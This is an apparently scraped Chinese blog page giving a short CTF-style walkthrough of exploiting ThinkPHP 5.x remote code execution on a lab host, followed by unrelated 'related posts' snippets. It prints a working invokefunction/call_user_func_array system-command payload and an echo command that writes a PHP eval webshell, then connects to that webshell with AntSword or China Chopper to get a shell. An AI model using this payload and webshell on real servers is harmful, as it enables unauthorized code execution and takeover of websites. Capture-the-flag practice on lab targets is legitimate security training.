2. 程式人生 > 實用技巧 >ThinkPHP 5.X版本網頁提權測試(CTF常見題型)

ThinkPHP 5.X版本網頁提權測試(CTF常見題型)

阿新 發佈:2020-10-19

ThinkPHP 5.X版本網頁提權測試

首先靶機地址http://192.168.1.111
登入
發現版本是thinkphp 5.X版本
果斷kali進行搜尋tinkphp拼接漏洞

在這裡插入圖片描述在這裡插入圖片描述

CD到5.X目錄下 檢視檔案 46150.txt

在這裡插入圖片描述
選用一條常用命令
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

進行url的index.php後拼接

在這裡插入圖片描述
拼接過後把cmd部分替換成命令 例如ls先檢視該網站下的php目錄
之後利用echo 指令寫入一句話木馬

echo ‘<?php @eval($_POST[6666]);?>’ > helloword.php
然後cat你寫入的檔案
檢視原始碼 必須要有你寫入的echo指令

此時可以用蟻劍or菜刀連線
在這裡插入圖片描述
在這裡插入圖片描述

完成提權 get shell!!!!!!!!!!

相關推薦

ThinkPHP 5.X版本網頁測試CTF常見題型

ThinkPHP 5.X版本網頁測試 首先靶機地址http://192.168.1.111 登入 發現版本thinkphp 5.X版本 果斷kali進行搜尋tinkphp拼接漏洞

polkit pkexec 本地漏洞CVE-2021-4034

漏洞描述 2022年1月25日 qualys安全研究人員披露 CVE-2021-4034 polkit pkexec 本地漏洞 漏洞細節,

Dirty-Pipe Linux核心漏洞CVE-2022-0847

前言: 划水一波,哈哈,以後復現漏洞不再直接傻瓜無腦的走流程了,首先碼字寫加構思比較麻煩且寫的不多還效率不高,現在就是當做見到了一個漏洞,在此記錄一下這個漏洞,包括其來源,簡單的描述,適用範圍,以及其具

ADB配置漏洞CVE-2017-13212原理與利用分析

0x01 背景 adb由於擁有shell許可權,因此僅在授權PC端後才可使用shell許可權,而通過該漏洞,可以實現在移動端獲取shell許可權,以致於可隨意刪除應用、螢幕截圖等等高許可權操作。不過移動端惡意應用程式必須能夠連

ThinkPHP 5.x.x RCE 總結

ThinkPHP 5.x [路由控制不嚴謹] RCE 影響範圍 ThinkPHP 5.0-5.0.23 ThinkPHP 5.1-5.1.31 Payload ?s=index/think\\request/input?data[]=phpinfo()&filter=assert

webpack-5.x版本 啟動server服務時的報錯和解決辦法

1.報錯: The \'mode\' option has not been set, webpack will fallback to \'production\' for this value.

最詳細Linux總結建議收藏

1、核心漏洞髒牛 檢視發行版本cat /etc/issuecat /etc/*-release檢視核心版本資訊

Windows總結——資料庫與系統漏洞

Windows總結 Windows總結(1)——資料庫與系統漏洞 0x01 核心漏洞

linux方法不斷更新

1.suid 搜尋符合條件的可以用來的: find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \\;

apache壓力測試效能及監控

Apache壓力測試(效能監控) 一:ab【Apache Benchmark】 簡介:AB是Apache自帶的一種壓力測工具,安裝完apache後,就可以在bin目錄下找到ab工具.ab命令會建立很多的併發訪問執行緒,模擬多個訪問者同時對某

Spring Boot +Vue 專案實戰筆記:前後端結合測試登入頁面開發

前言:關於開發環境 每位 Coder 都有自己偏好的開發工具,從大的方面劃分主要有文字編輯器流和IDE流兩種,我有一段時間也喜歡用編輯器Sublime Text、Vim,但對我來說開發效率確實不如使用 IDE 高,所以就放棄了。

求方程:cos(x)-x=0的一個實根迭代步驟

技術標籤:c語言 求方程:cos(x)-x=0的一個實根迭代步驟 問題:功能:編寫函式float fun(),利用以簡單迭代方法Xn+1=cos(Xn)求方程:cos(x)-x=0的一個實根。迭代步驟如下: 1取x1初值為0.0; 2x0=x1

版本微信分享sdk1.8.3踩坑實錄

技術標籤:三方庫使用心得 第一種 - (BOOL)application:(UIApplication *)app openURL:(NSURL *)url options:(NSDictionary<NSString *,id> *)options

網頁連線至資料庫asp->mdb

技術標籤:資料庫 ** 本文為個人記錄使用,出現問題概不負責 ** 前言 基於ASP,jQuery,AJAX等,實現網頁連線至伺服器access資料庫,提取檔案並返回,動態更新當前頁面。 用來實現簡易試題測試系統。

OSError: image file is truncated (X bytes not processed)解決方案無需刪資料

問題的原因:沒弄懂,畢竟我找到問題圖片檢視後,也沒發現啥問題..... 我的當前環境:資料集圖片為jpg格式,圖片的量級有點大,估計問題圖片有點多,所以不能直接刪除或者跳過,所以得找出來,再重新處理後放回原位

天貓國際自營:吉列鋒隱 5 剃鬚刀頭 8 只 98 元京東 129 元

天貓國際進口超市:吉列鋒隱 5 五層剃鬚刀頭 8 只報價 150 元,下單立享 8 折,限時限量 22 元券,實付 98 元包郵,領券併購買。

2021藍橋杯----最小區間dp解法

直接暴力區間dp,可以出來結果只是時間需要長點,需要16秒 結果:2653631372 #include<iostream>

Jmeter資料庫壓力測試含階梯式增壓

目錄 〇、前言。 一、jmeter工具安裝。 二、資料庫驅動外掛jar包安裝。 三、指令碼開發與除錯。

Win11 安卓子系統來了,微軟宣佈面向 Beta 通道開啟測試附攻略

10 月 20 日訊息,微軟 Win11 安卓子系統在官宣後經過多次曝光,現在終於要來了。據網友 @扶搖直上九萬里 投稿,Win11 安卓子系統將面向 Beta 通道的美國使用者開啟測試。微軟表示,在 Windows 11 的安卓 App 將擁有

聯想小新 Pad Pro 12.6 平板電腦開啟 ZUI 13 OTA1 灰度測試升級內容一覽

12 月 3 日訊息,聯想小新 Pad Pro 12.6 平板電腦將於今晚 6 點開啟 ZUI 13 OTA1灰度測試,分為 6 個時段,使用者在設定 — 關於本機 — 系統更新中檢查更新即可參與。瞭解到,本次灰度測試版本號為 13.0.469,升級